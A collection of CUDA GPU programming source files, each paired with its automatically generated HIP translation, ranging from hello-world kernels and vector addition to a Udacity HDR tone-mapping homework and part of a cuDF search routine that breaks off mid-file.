#include "energy.h" #include <cuda_runtime_api.h> #include <cuda.h> #define THREAD_PER_BLOCK 128 __global__ void kernel(int number_of_points, double *d_value) { int i; i = blockDim.x * blockIdx.x + threadIdx.x ; if (i<number_of_points) { double *value = d_value + i * C_NUMBER_OF_VARIABLES; double x = C_A * sin(d_value[phase]); // displacement double v = C_A * C_omega * cos(d_value[phase]); // velocity double U = C_k * x * x / 2.; // potential energy double K = C_m * v * v / 2.; // kinetic energy value[E] += (U + K) / M; // mechanical energy value[phase] += C_omega; // phase progress } } extern "C" void extern_run(const int number_of_points, double *d_value) { int blocks = number_of_points/THREAD_PER_BLOCK +1; // add code to init blocks kernel<<<blocks, THREAD_PER_BLOCK>>>(number_of_points, d_value); }
a291a31cc5979c721d42ad58342ec1dcdf192647.hip
// !!! This is a file automatically generated by hipify!!!
#include "hip/hip_runtime.h"
#include <stdio.h>

__global__ void helloGPU(void)
{
    printf(" From thread %d : Sugan Nalla - GPU ! \n ", threadIdx.x);
}

int main(void)
{
    // From CPU
    printf(" Sugan Nalla - CPU ! \n ");
    hipLaunchKernelGGL(( helloGPU), dim3(1), dim3(10), 0, 0, );
    hipDeviceReset();
    return 0;
}
a291a31cc5979c721d42ad58342ec1dcdf192647.cu
#include <stdio.h>

__global__ void helloGPU(void)
{
    printf(" From thread %d : Sugan Nalla - GPU ! \n ", threadIdx.x);
}

int main(void)
{
    // From CPU
    printf(" Sugan Nalla - CPU ! \n ");
    helloGPU <<< 1, 10 >>>();
    cudaDeviceReset();
    return 0;
}
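A note on this hello-world pair: device-side printf output is buffered and here it is flushed implicitly by cudaDeviceReset() (hipDeviceReset() in the HIP version). If the reset call were removed, an explicit synchronization would be needed before main returns; a minimal variant sketch, not taken from the file above:

// Variant sketch: synchronize explicitly so the kernel's printf output is flushed
// even without resetting the device.
helloGPU <<< 1, 10 >>>();
cudaDeviceSynchronize();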
04e6285b0efeda3b306133439f1ef471d52e3a75.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* Udacity Homework 3 HDR Tone-mapping Background HDR ============== A High Dynamic Range (HDR) image contains a wider variation of intensity and color than is allowed by the RGB format with 1 byte per channel that we have used in the previous assignment. To store this extra information we use single precision floating point for each channel. This allows for an extremely wide range of intensity values. In the image for this assignment, the inside of church with light coming in through stained glass windows, the raw input floating point values for the channels range from 0 to 275. But the mean is .41 and 98% of the values are less than 3! This means that certain areas (the windows) are extremely bright compared to everywhere else. If we linearly map this [0-275] range into the [0-255] range that we have been using then most values will be mapped to zero! The only thing we will be able to see are the very brightest areas - the windows - everything else will appear pitch black. The problem is that although we have cameras capable of recording the wide range of intensity that exists in the real world our monitors are not capable of displaying them. Our eyes are also quite capable of observing a much wider range of intensities than our image formats / monitors are capable of displaying. Tone-mapping is a process that transforms the intensities in the image so that the brightest values aren't nearly so far away from the mean. That way when we transform the values into [0-255] we can actually see the entire image. There are many ways to perform this process and it is as much an art as a science - there is no single "right" answer. In this homework we will implement one possible technique. Background Chrominance-Luminance ================================ The RGB space that we have been using to represent images can be thought of as one possible set of axes spanning a three dimensional space of color. We sometimes choose other axes to represent this space because they make certain operations more convenient. Another possible way of representing a color image is to separate the color information (chromaticity) from the brightness information. There are multiple different methods for doing this - a common one during the analog television days was known as Chrominance-Luminance or YUV. We choose to represent the image in this way so that we can remap only the intensity channel and then recombine the new intensity values with the color information to form the final image. Old TV signals used to be transmitted in this way so that black & white televisions could display the luminance channel while color televisions would display all three of the channels. Tone-mapping ============ In this assignment we are going to transform the luminance channel (actually the log of the luminance, but this is unimportant for the parts of the algorithm that you will be implementing) by compressing its range to [0, 1]. To do this we need the cumulative distribution of the luminance values. Example ------- input : [2 4 3 3 1 7 4 5 7 0 9 4 3 2] min / max / range: 0 / 9 / 9 histo with 3 bins: [4 7 3] cdf : [4 11 14] Your task is to calculate this cumulative distribution by following these steps. 
*/ #include <limits.h> #include <float.h> #include <math.h> #include <stdio.h> #include "utils.h" __global__ void histogram_kernel(unsigned int* d_bins, const float* d_in, const int bin_count, const float lum_min, const float lum_max, const int size) { int index = threadIdx.x + blockDim.x * blockIdx.x; if(index >= size) { return; } float lum_range = lum_max - lum_min; int bin = ((d_in[index] - lum_min) / lum_range) * bin_count; atomicAdd(&d_bins[bin], 1); } __global__ void scan_kernel(unsigned int* d_bins, int size) { int index = threadIdx.x + blockDim.x * blockIdx.x; if(index >= size) { return; } for(int i = 1; i <= size; i *= 2) { int spot = index - i; unsigned int val = 0; if(spot >= 0) { val = d_bins[spot]; } __syncthreads(); if(spot >= 0) { d_bins[index] += val; } __syncthreads(); } } // calculate reduce max or min and stick the value in d_answer. __global__ void reduceMinMax_kernel(const float* const d_in, float* d_out, const size_t size, int minmax) { extern __shared__ float shared[]; int index = threadIdx.x + blockDim.x * blockIdx.x; int threadId = threadIdx.x; // we have 1 thread per block, so copying the entire block should work fine if(index < size) { shared[threadId] = d_in[index]; } else { if(minmax == 0) { shared[threadId] = FLT_MAX; } else { shared[threadId] = -FLT_MAX; } } // wait for all threads to copy the memory __syncthreads(); // don't do any thing with memory if we happen to be far off ( I don't know how this works with // sync threads so I moved it after that point ) if(index >= size) { if(threadId == 0) { if(minmax == 0) { d_out[blockIdx.x] = FLT_MAX; } else { d_out[blockIdx.x] = -FLT_MAX; } } return; } for(unsigned int i = blockDim.x/2; i > 0; i /= 2) { if(threadId < i) { if(minmax == 0) { shared[threadId] = min(shared[threadId], shared[threadId + i]); } else { shared[threadId] = max(shared[threadId], shared[threadId + i]); } } __syncthreads(); } if(threadId == 0) { d_out[blockIdx.x] = shared[0]; } } int get_max_size(int n, int d) { return (int)ceil( (float)n/(float)d ) + 1; } float reduceMinMax(const float* const d_in, const size_t size, int minMax) { int BLOCK_SIZE = 32; // we need to keep reducing until we get to the amount that we consider // having the entire thing fit into one block size size_t curr_size = size; float* d_curr_in; checkCudaErrors(hipMalloc(&d_curr_in, sizeof(float) * size)); checkCudaErrors(hipMemcpy(d_curr_in, d_in, sizeof(float) * size, hipMemcpyDeviceToDevice)); float* d_curr_out; dim3 thread_dim(BLOCK_SIZE); const int shared_mem_size = sizeof(float)*BLOCK_SIZE; while(true) { checkCudaErrors(hipMalloc(&d_curr_out, sizeof(float) * get_max_size(curr_size, BLOCK_SIZE))); dim3 block_dim(get_max_size(size, BLOCK_SIZE)); hipLaunchKernelGGL(( reduceMinMax_kernel), dim3(block_dim), dim3(thread_dim), shared_mem_size, 0, d_curr_in, d_curr_out, curr_size, minMax); hipDeviceSynchronize(); checkCudaErrors(hipGetLastError()); // move the current input to the output, and clear the last input if necessary checkCudaErrors(hipFree(d_curr_in)); d_curr_in = d_curr_out; if(curr_size < BLOCK_SIZE) break; curr_size = get_max_size(curr_size, BLOCK_SIZE); } // theoretically we should be float h_out; hipMemcpy(&h_out, d_curr_out, sizeof(float), hipMemcpyDeviceToHost); hipFree(d_curr_out); return h_out; } void your_histogram_and_prefixsum(const float* const d_logLuminance, unsigned int* const d_cdf, float &min_logLum, float &max_logLum, const size_t numRows, const size_t numCols, const size_t numBins) { const size_t size = numRows*numCols; min_logLum = 
reduceMinMax(d_logLuminance, size, 0); max_logLum = reduceMinMax(d_logLuminance, size, 1); printf("Got min value: %f\n", min_logLum); printf("Got max value: %f\n", max_logLum); printf("Number of Bins: %d\n\n", numBins); unsigned int* d_bins; size_t histo_size = sizeof(unsigned int)*numBins; //determine the size of the bins checkCudaErrors(hipMalloc(&d_bins, histo_size)); checkCudaErrors(hipMemset(d_bins, 0, histo_size)); //set up the thread dimensions dim3 thread_dim(1024); dim3 hist_block_dim(get_max_size(size, thread_dim.x)); // deploy the kernel and calculate the image hipLaunchKernelGGL(( histogram_kernel), dim3(hist_block_dim), dim3(thread_dim), 0, 0, d_bins, d_logLuminance, numBins, min_logLum, max_logLum, size); hipDeviceSynchronize(); checkCudaErrors(hipGetLastError()); // get the output from the device unsigned int h_out[100]; hipMemcpy(&h_out, d_bins, sizeof(unsigned int) * 100, hipMemcpyDeviceToHost); // set up the can block dim3 scan_block_dim(get_max_size(numBins, thread_dim.x)); // release the kernels hipLaunchKernelGGL(( scan_kernel), dim3(scan_block_dim), dim3(thread_dim), 0, 0, d_bins, numBins); hipDeviceSynchronize(); checkCudaErrors(hipGetLastError()); // copy the data back over hipMemcpy(&h_out, d_bins, sizeof(unsigned int)*100, hipMemcpyDeviceToHost); hipMemcpy(d_cdf, d_bins, histo_size, hipMemcpyDeviceToDevice); checkCudaErrors(hipFree(d_bins)); //TODO /*Here are the steps you need to implement X - 1) find the minimum and maximum value in the input logLuminance channel store in min_logLum and max_logLum X - 2) subtract them to find the range X - 3) generate a histogram of all the values in the logLuminance channel using the formula: bin = (lum[i] - lumMin) / lumRange * numBins X - 4) Perform an exclusive scan (prefix sum) on the histogram to get the cumulative distribution of luminance values (this should go in the incoming d_cdf pointer which already has been allocated for you) */ }
04e6285b0efeda3b306133439f1ef471d52e3a75.cu
/* Udacity Homework 3 HDR Tone-mapping Background HDR ============== A High Dynamic Range (HDR) image contains a wider variation of intensity and color than is allowed by the RGB format with 1 byte per channel that we have used in the previous assignment. To store this extra information we use single precision floating point for each channel. This allows for an extremely wide range of intensity values. In the image for this assignment, the inside of church with light coming in through stained glass windows, the raw input floating point values for the channels range from 0 to 275. But the mean is .41 and 98% of the values are less than 3! This means that certain areas (the windows) are extremely bright compared to everywhere else. If we linearly map this [0-275] range into the [0-255] range that we have been using then most values will be mapped to zero! The only thing we will be able to see are the very brightest areas - the windows - everything else will appear pitch black. The problem is that although we have cameras capable of recording the wide range of intensity that exists in the real world our monitors are not capable of displaying them. Our eyes are also quite capable of observing a much wider range of intensities than our image formats / monitors are capable of displaying. Tone-mapping is a process that transforms the intensities in the image so that the brightest values aren't nearly so far away from the mean. That way when we transform the values into [0-255] we can actually see the entire image. There are many ways to perform this process and it is as much an art as a science - there is no single "right" answer. In this homework we will implement one possible technique. Background Chrominance-Luminance ================================ The RGB space that we have been using to represent images can be thought of as one possible set of axes spanning a three dimensional space of color. We sometimes choose other axes to represent this space because they make certain operations more convenient. Another possible way of representing a color image is to separate the color information (chromaticity) from the brightness information. There are multiple different methods for doing this - a common one during the analog television days was known as Chrominance-Luminance or YUV. We choose to represent the image in this way so that we can remap only the intensity channel and then recombine the new intensity values with the color information to form the final image. Old TV signals used to be transmitted in this way so that black & white televisions could display the luminance channel while color televisions would display all three of the channels. Tone-mapping ============ In this assignment we are going to transform the luminance channel (actually the log of the luminance, but this is unimportant for the parts of the algorithm that you will be implementing) by compressing its range to [0, 1]. To do this we need the cumulative distribution of the luminance values. Example ------- input : [2 4 3 3 1 7 4 5 7 0 9 4 3 2] min / max / range: 0 / 9 / 9 histo with 3 bins: [4 7 3] cdf : [4 11 14] Your task is to calculate this cumulative distribution by following these steps. 
*/ #include <limits.h> #include <float.h> #include <math.h> #include <stdio.h> #include "utils.h" __global__ void histogram_kernel(unsigned int* d_bins, const float* d_in, const int bin_count, const float lum_min, const float lum_max, const int size) { int index = threadIdx.x + blockDim.x * blockIdx.x; if(index >= size) { return; } float lum_range = lum_max - lum_min; int bin = ((d_in[index] - lum_min) / lum_range) * bin_count; atomicAdd(&d_bins[bin], 1); } __global__ void scan_kernel(unsigned int* d_bins, int size) { int index = threadIdx.x + blockDim.x * blockIdx.x; if(index >= size) { return; } for(int i = 1; i <= size; i *= 2) { int spot = index - i; unsigned int val = 0; if(spot >= 0) { val = d_bins[spot]; } __syncthreads(); if(spot >= 0) { d_bins[index] += val; } __syncthreads(); } } // calculate reduce max or min and stick the value in d_answer. __global__ void reduceMinMax_kernel(const float* const d_in, float* d_out, const size_t size, int minmax) { extern __shared__ float shared[]; int index = threadIdx.x + blockDim.x * blockIdx.x; int threadId = threadIdx.x; // we have 1 thread per block, so copying the entire block should work fine if(index < size) { shared[threadId] = d_in[index]; } else { if(minmax == 0) { shared[threadId] = FLT_MAX; } else { shared[threadId] = -FLT_MAX; } } // wait for all threads to copy the memory __syncthreads(); // don't do any thing with memory if we happen to be far off ( I don't know how this works with // sync threads so I moved it after that point ) if(index >= size) { if(threadId == 0) { if(minmax == 0) { d_out[blockIdx.x] = FLT_MAX; } else { d_out[blockIdx.x] = -FLT_MAX; } } return; } for(unsigned int i = blockDim.x/2; i > 0; i /= 2) { if(threadId < i) { if(minmax == 0) { shared[threadId] = min(shared[threadId], shared[threadId + i]); } else { shared[threadId] = max(shared[threadId], shared[threadId + i]); } } __syncthreads(); } if(threadId == 0) { d_out[blockIdx.x] = shared[0]; } } int get_max_size(int n, int d) { return (int)ceil( (float)n/(float)d ) + 1; } float reduceMinMax(const float* const d_in, const size_t size, int minMax) { int BLOCK_SIZE = 32; // we need to keep reducing until we get to the amount that we consider // having the entire thing fit into one block size size_t curr_size = size; float* d_curr_in; checkCudaErrors(cudaMalloc(&d_curr_in, sizeof(float) * size)); checkCudaErrors(cudaMemcpy(d_curr_in, d_in, sizeof(float) * size, cudaMemcpyDeviceToDevice)); float* d_curr_out; dim3 thread_dim(BLOCK_SIZE); const int shared_mem_size = sizeof(float)*BLOCK_SIZE; while(true) { checkCudaErrors(cudaMalloc(&d_curr_out, sizeof(float) * get_max_size(curr_size, BLOCK_SIZE))); dim3 block_dim(get_max_size(size, BLOCK_SIZE)); reduceMinMax_kernel<<<block_dim, thread_dim, shared_mem_size>>> (d_curr_in, d_curr_out, curr_size, minMax); cudaDeviceSynchronize(); checkCudaErrors(cudaGetLastError()); // move the current input to the output, and clear the last input if necessary checkCudaErrors(cudaFree(d_curr_in)); d_curr_in = d_curr_out; if(curr_size < BLOCK_SIZE) break; curr_size = get_max_size(curr_size, BLOCK_SIZE); } // theoretically we should be float h_out; cudaMemcpy(&h_out, d_curr_out, sizeof(float), cudaMemcpyDeviceToHost); cudaFree(d_curr_out); return h_out; } void your_histogram_and_prefixsum(const float* const d_logLuminance, unsigned int* const d_cdf, float &min_logLum, float &max_logLum, const size_t numRows, const size_t numCols, const size_t numBins) { const size_t size = numRows*numCols; min_logLum = reduceMinMax(d_logLuminance, size, 
0); max_logLum = reduceMinMax(d_logLuminance, size, 1); printf("Got min value: %f\n", min_logLum); printf("Got max value: %f\n", max_logLum); printf("Number of Bins: %d\n\n", numBins); unsigned int* d_bins; size_t histo_size = sizeof(unsigned int)*numBins; //determine the size of the bins checkCudaErrors(cudaMalloc(&d_bins, histo_size)); checkCudaErrors(cudaMemset(d_bins, 0, histo_size)); //set up the thread dimensions dim3 thread_dim(1024); dim3 hist_block_dim(get_max_size(size, thread_dim.x)); // deploy the kernel and calculate the image histogram_kernel<<<hist_block_dim, thread_dim>>> (d_bins, d_logLuminance, numBins, min_logLum, max_logLum, size); cudaDeviceSynchronize(); checkCudaErrors(cudaGetLastError()); // get the output from the device unsigned int h_out[100]; cudaMemcpy(&h_out, d_bins, sizeof(unsigned int) * 100, cudaMemcpyDeviceToHost); // set up the can block dim3 scan_block_dim(get_max_size(numBins, thread_dim.x)); // release the kernels scan_kernel<<<scan_block_dim, thread_dim>>>(d_bins, numBins); cudaDeviceSynchronize(); checkCudaErrors(cudaGetLastError()); // copy the data back over cudaMemcpy(&h_out, d_bins, sizeof(unsigned int)*100, cudaMemcpyDeviceToHost); cudaMemcpy(d_cdf, d_bins, histo_size, cudaMemcpyDeviceToDevice); checkCudaErrors(cudaFree(d_bins)); //TODO /*Here are the steps you need to implement X - 1) find the minimum and maximum value in the input logLuminance channel store in min_logLum and max_logLum X - 2) subtract them to find the range X - 3) generate a histogram of all the values in the logLuminance channel using the formula: bin = (lum[i] - lumMin) / lumRange * numBins X - 4) Perform an exclusive scan (prefix sum) on the histogram to get the cumulative distribution of luminance values (this should go in the incoming d_cdf pointer which already has been allocated for you) */ }
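The header comment of this homework pair walks the pipeline through a concrete example: a 3-bin histogram [4 7 3] whose running sum gives the CDF [4 11 14]. The scan_kernel above produces exactly that inclusive prefix sum (the TODO text asks for an exclusive scan, which would instead yield [0 4 11]). A tiny CPU reference for the worked example, written here only to make the arithmetic explicit:

// CPU reference for the example in the header comment: histogram [4 7 3]
// scanned inclusively gives [4 11 14]; an exclusive scan would give [0 4 11].
#include <vector>
#include <cassert>

int main()
{
    std::vector<unsigned int> histo{4, 7, 3};
    std::vector<unsigned int> cdf(histo);
    for (size_t i = 1; i < cdf.size(); ++i) cdf[i] += cdf[i - 1];  // inclusive scan
    assert(cdf[0] == 4 && cdf[1] == 11 && cdf[2] == 14);
    return 0;
}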
6aefcef3d3619bd2478d43bf5915129d37a0ec1d.hip
// !!! This is a file automatically generated by hipify!!! #include <hip/hip_runtime.h> #include "device_launch_parameters.h" #include <iostream> #include <stdio.h> #include <chrono> #include "ParticleRenderer.hpp" #include "ParticleSystem.hpp" #include "math.cuh" int main(int argc, char** argv) { srand(time(NULL)); ParticleRenderer ren; glutInit(&argc, argv); ren.initGL(); ren.initSystem(); ren.begin(); /* //defining program attributes int N = 1000; size_t size = N * sizeof(float); //int TPB = 1024; //threads per block int times = 1; //allocating host memory float *res = (float *)malloc(size); float *in1 = (float *)malloc(size); float *in2 = (float *)malloc(size); //defining pointers to device memory float *d_res = NULL; float *d_in1 = NULL; float *d_in2 = NULL; //initializing values for (int i = 0; i < N; i++) { in1[i] = rand() / (float)RAND_MAX; in2[i] = rand() / (float)RAND_MAX; } auto t1 = Clock::now(); hipMalloc((void**)&d_res, size); hipMalloc((void**)&d_in1, size); hipMalloc((void**)&d_in2, size); //copying to device memory hipError_t err = hipMemcpy(d_res, res, size, hipMemcpyHostToDevice); err = hipMemcpy(d_in1, in1, size, hipMemcpyHostToDevice); err = hipMemcpy(d_in2, in2, size, hipMemcpyHostToDevice); //call function to execute on device int numblocks = (N + TPB - 1) / TPB; for (int i = 0; i < times; i++) { ARR_ADDC << <numblocks, TPB >> >(d_res, d_in1, d_in2, N); } err = hipGetLastError(); if (err != hipSuccess) { fprintf(stderr, "Failed to launch vectorAdd kernel (error code %s)!\n", hipGetErrorString(err)); exit(EXIT_FAILURE); } //copy result back to host err = hipMemcpy(res, d_res, size, hipMemcpyDeviceToHost); //free memory on device hipFree(d_res); hipFree(d_in1); hipFree(d_in2); auto t2 = Clock::now(); std::cout << "Delta t2-t1: " << std::chrono::duration_cast<std::chrono::nanoseconds>(t2 - t1).count() << " nanoseconds" << std::endl; //print result to window double checksum = 0; for (int i = 0; i < N; i++) { checksum += res[i]; } std::cout << "Parrelelized N=" << N << " : " << checksum << std::endl; float *in1N = in2; float *in2N = in1; //free host memory free(res); auto t1N = Clock::now(); float *resN = (float*)malloc(size); for (int ii = 0; ii < times; ii++) { for (int i = 0; i < N; i++) { resN[i] = in1N[i] + in2N[i]; } } auto t2N = Clock::now(); std::cout << "Delta t2-t1: " << std::chrono::duration_cast<std::chrono::nanoseconds>(t2N - t1N).count() << " nanoseconds" << std::endl; checksum = 0; for (int i = 0; i < N; i++) { checksum += resN[i]; } std::cout << "Standard N=" << N << " : " << checksum << std::endl; free(in1); free(in2); */ }
6aefcef3d3619bd2478d43bf5915129d37a0ec1d.cu
#include <cuda_runtime.h> #include "device_launch_parameters.h" #include <iostream> #include <stdio.h> #include <chrono> #include "ParticleRenderer.hpp" #include "ParticleSystem.hpp" #include "math.cuh" int main(int argc, char** argv) { srand(time(NULL)); ParticleRenderer ren; glutInit(&argc, argv); ren.initGL(); ren.initSystem(); ren.begin(); /* //defining program attributes int N = 1000; size_t size = N * sizeof(float); //int TPB = 1024; //threads per block int times = 1; //allocating host memory float *res = (float *)malloc(size); float *in1 = (float *)malloc(size); float *in2 = (float *)malloc(size); //defining pointers to device memory float *d_res = NULL; float *d_in1 = NULL; float *d_in2 = NULL; //initializing values for (int i = 0; i < N; i++) { in1[i] = rand() / (float)RAND_MAX; in2[i] = rand() / (float)RAND_MAX; } auto t1 = Clock::now(); cudaMalloc((void**)&d_res, size); cudaMalloc((void**)&d_in1, size); cudaMalloc((void**)&d_in2, size); //copying to device memory cudaError_t err = cudaMemcpy(d_res, res, size, cudaMemcpyHostToDevice); err = cudaMemcpy(d_in1, in1, size, cudaMemcpyHostToDevice); err = cudaMemcpy(d_in2, in2, size, cudaMemcpyHostToDevice); //call function to execute on device int numblocks = (N + TPB - 1) / TPB; for (int i = 0; i < times; i++) { ARR_ADDC << <numblocks, TPB >> >(d_res, d_in1, d_in2, N); } err = cudaGetLastError(); if (err != cudaSuccess) { fprintf(stderr, "Failed to launch vectorAdd kernel (error code %s)!\n", cudaGetErrorString(err)); exit(EXIT_FAILURE); } //copy result back to host err = cudaMemcpy(res, d_res, size, cudaMemcpyDeviceToHost); //free memory on device cudaFree(d_res); cudaFree(d_in1); cudaFree(d_in2); auto t2 = Clock::now(); std::cout << "Delta t2-t1: " << std::chrono::duration_cast<std::chrono::nanoseconds>(t2 - t1).count() << " nanoseconds" << std::endl; //print result to window double checksum = 0; for (int i = 0; i < N; i++) { checksum += res[i]; } std::cout << "Parrelelized N=" << N << " : " << checksum << std::endl; float *in1N = in2; float *in2N = in1; //free host memory free(res); auto t1N = Clock::now(); float *resN = (float*)malloc(size); for (int ii = 0; ii < times; ii++) { for (int i = 0; i < N; i++) { resN[i] = in1N[i] + in2N[i]; } } auto t2N = Clock::now(); std::cout << "Delta t2-t1: " << std::chrono::duration_cast<std::chrono::nanoseconds>(t2N - t1N).count() << " nanoseconds" << std::endl; checksum = 0; for (int i = 0; i < N; i++) { checksum += resN[i]; } std::cout << "Standard N=" << N << " : " << checksum << std::endl; free(in1); free(in2); */ }
8007db367ed863cdff8e196528d057655d20c7bf.hip
// !!! This is a file automatically generated by hipify!!!
#include "hip/hip_runtime.h"
#include "vector.h"
#include <iostream>
#include <math.h>

// Add vector
__global__ void _cuda_add(int n, float *x, float *y)
{
    int index = threadIdx.x;
    int stride = blockDim.x;
    for (int i = index; i < n; i += stride)
        y[i] = x[i] + y[i];
}

namespace Vectors {
    // Accepts
    void add(float *&x, float *&y, void(*callable)(float *&, float *&, int), int N)
    {
        // Allocate Unified Memory accessible from CPU or GPU
        hipMallocManaged(&x, N*sizeof(float));
        hipMallocManaged(&y, N*sizeof(float));

        callable(x, y, N);

        // Run kernel on 1M elements on the GPU
        hipLaunchKernelGGL(( _cuda_add), dim3(1), dim3(256), 0, 0, N, x, y);

        // Wait for GPU to finish before accessing on host
        hipDeviceSynchronize();
    }

    void free(float *&x, float *&y)
    {
        hipFree(x);
        hipFree(y);
    }
}
8007db367ed863cdff8e196528d057655d20c7bf.cu
#include "vector.h" #include <iostream> #include <math.h> // Add vector __global__ void _cuda_add(int n, float *x, float *y) { int index = threadIdx.x; int stride = blockDim.x; for (int i = index; i < n; i += stride) y[i] = x[i] + y[i]; } namespace Vectors { // Accepts void add(float *&x, float *&y, void(*callable)(float *&, float *&, int), int N) { // Allocate Unified Memory – accessible from CPU or GPU cudaMallocManaged(&x, N*sizeof(float)); cudaMallocManaged(&y, N*sizeof(float)); callable(x, y, N); // Run kernel on 1M elements on the GPU _cuda_add<<<1, 256>>>(N, x, y); // Wait for GPU to finish before accessing on host cudaDeviceSynchronize(); } void free(float *&x, float *&y) { cudaFree(x); cudaFree(y); } }
9bffe7f1e251744d18617bf81187d4bb52c8853a.hip
// !!! This is a file automatically generated by hipify!!!
#include "hip/hip_runtime.h"
#include <iostream>

__global__ void add(int a, int b, int *c){
    *c = a + b;
}

int main(void)
{
    int c;
    int *dev_c;
    hipMalloc( (void **)&dev_c, sizeof(int) );
    hipLaunchKernelGGL(( add), dim3(1), dim3(1), 0, 0, 2, 7, dev_c);
    hipMemcpy(&c, dev_c, sizeof(int), hipMemcpyDeviceToHost);
    std::cout << "2 + 7 =" << c << std::endl;
    hipFree(dev_c);
    return 0;
}
9bffe7f1e251744d18617bf81187d4bb52c8853a.cu
#include <iostream>

__global__ void add(int a, int b, int *c){
    *c = a + b;
}

int main(void)
{
    int c;
    int *dev_c;
    cudaMalloc( (void **)&dev_c, sizeof(int) );
    add<<<1,1>>>(2, 7, dev_c);
    cudaMemcpy(&c, dev_c, sizeof(int), cudaMemcpyDeviceToHost);
    std::cout << "2 + 7 =" << c << std::endl;
    cudaFree(dev_c);
    return 0;
}
cd169086204ff89cc7e65dad9c4a6215e44c324e.hip
// !!! This is a file automatically generated by hipify!!! /* * Copyright (c) 2019-2020, NVIDIA CORPORATION. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <cudf/column/column_factories.hpp> #include <cudf/detail/iterator.cuh> #include <cudf/detail/nvtx/ranges.hpp> #include <cudf/detail/search.hpp> #include <cudf/dictionary/detail/search.hpp> #include <cudf/dictionary/detail/update_keys.hpp> #include <cudf/scalar/scalar_device_view.cuh> #include <cudf/search.hpp> #include <cudf/table/row_operators.cuh> #include <cudf/table/table_device_view.cuh> #include <cudf/table/table_view.hpp> #include <hash/unordered_multiset.cuh> #include <rmm/cuda_stream_view.hpp> #include <thrust/binary_search.h> namespace cudf { namespace { template <typename DataIterator, typename ValuesIterator, typename OutputIterator, typename Comparator> void launch_search(DataIterator it_data, ValuesIterator it_vals, size_type data_size, size_type values_size, OutputIterator it_output, Comparator comp, bool find_first, rmm::cuda_stream_view stream) { if (find_first) { thrust::lower_bound(rmm::exec_policy(stream)->on(stream.value()), it_data, it_data + data_size, it_vals, it_vals + values_size, it_output, comp); } else { thrust::upper_bound(rmm::exec_policy(stream)->on(stream.value()), it_data, it_data + data_size, it_vals, it_vals + values_size, it_output, comp); } } std::unique_ptr<column> search_ordered(table_view const& t, table_view const& values, bool find_first, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { // Allocate result column std::unique_ptr<column> result = make_numeric_column( data_type{type_to_id<size_type>()}, values.num_rows(), mask_state::UNALLOCATED, stream, mr); mutable_column_view result_view = result.get()->mutable_view(); // Handle empty inputs if (t.num_rows() == 0) { CUDA_TRY(hipMemsetAsync( result_view.data<size_type>(), 0, values.num_rows() * sizeof(size_type), stream.value())); return result; } if (not column_order.empty()) { CUDF_EXPECTS(static_cast<std::size_t>(t.num_columns()) == column_order.size(), "Mismatch between number of columns and column order."); } if (not null_precedence.empty()) { CUDF_EXPECTS(static_cast<std::size_t>(t.num_columns()) == null_precedence.size(), "Mismatch between number of columns and null precedence."); } // This utility will ensure all corresponding dictionary columns have matching keys. // It will return any new dictionary columns created as well as updated table_views. 
auto matched = dictionary::detail::match_dictionaries({t, values}, stream); auto d_t = table_device_view::create(matched.second.front(), stream); auto d_values = table_device_view::create(matched.second.back(), stream); auto count_it = thrust::make_counting_iterator<size_type>(0); rmm::device_vector<order> d_column_order(column_order.begin(), column_order.end()); rmm::device_vector<null_order> d_null_precedence(null_precedence.begin(), null_precedence.end()); if (has_nulls(t) or has_nulls(values)) { auto ineq_op = (find_first) ? row_lexicographic_comparator<true>( *d_t, *d_values, d_column_order.data().get(), d_null_precedence.data().get()) : row_lexicographic_comparator<true>( *d_values, *d_t, d_column_order.data().get(), d_null_precedence.data().get()); launch_search(count_it, count_it, t.num_rows(), values.num_rows(), result_view.data<size_type>(), ineq_op, find_first, stream); } else { auto ineq_op = (find_first) ? row_lexicographic_comparator<false>( *d_t, *d_values, d_column_order.data().get(), d_null_precedence.data().get()) : row_lexicographic_comparator<false>( *d_values, *d_t, d_column_order.data().get(), d_null_precedence.data().get()); launch_search(count_it, count_it, t.num_rows(), values.num_rows(), result_view.data<size_type>(), ineq_op, find_first, stream); } return result; } struct contains_scalar_dispatch { template <typename Element> bool operator()(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { CUDF_EXPECTS(col.type() == value.type(), "scalar and column types must match"); using Type = device_storage_type_t<Element>; using ScalarType = cudf::scalar_type_t<Element>; auto d_col = column_device_view::create(col, stream); auto s = static_cast<const ScalarType*>(&value); if (col.has_nulls()) { auto found_iter = thrust::find(rmm::exec_policy(stream)->on(stream.value()), d_col->pair_begin<Type, true>(), d_col->pair_end<Type, true>(), thrust::make_pair(s->value(), true)); return found_iter != d_col->pair_end<Type, true>(); } else { auto found_iter = thrust::find(rmm::exec_policy(stream)->on(stream.value()), // d_col->begin<Type>(), d_col->end<Type>(), s->value()); return found_iter != d_col->end<Type>(); } } }; template <> bool contains_scalar_dispatch::operator()<cudf::list_view>(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { CUDF_FAIL("list_view type not supported yet"); } template <> bool contains_scalar_dispatch::operator()<cudf::struct_view>(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { CUDF_FAIL("struct_view type not supported yet"); } template <> bool contains_scalar_dispatch::operator()<cudf::dictionary32>(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { auto dict_col = cudf::dictionary_column_view(col); // first, find the value in the dictionary's key set auto index = cudf::dictionary::detail::get_index(dict_col, value, stream); // if found, check the index is actually in the indices column return index->is_valid() ? 
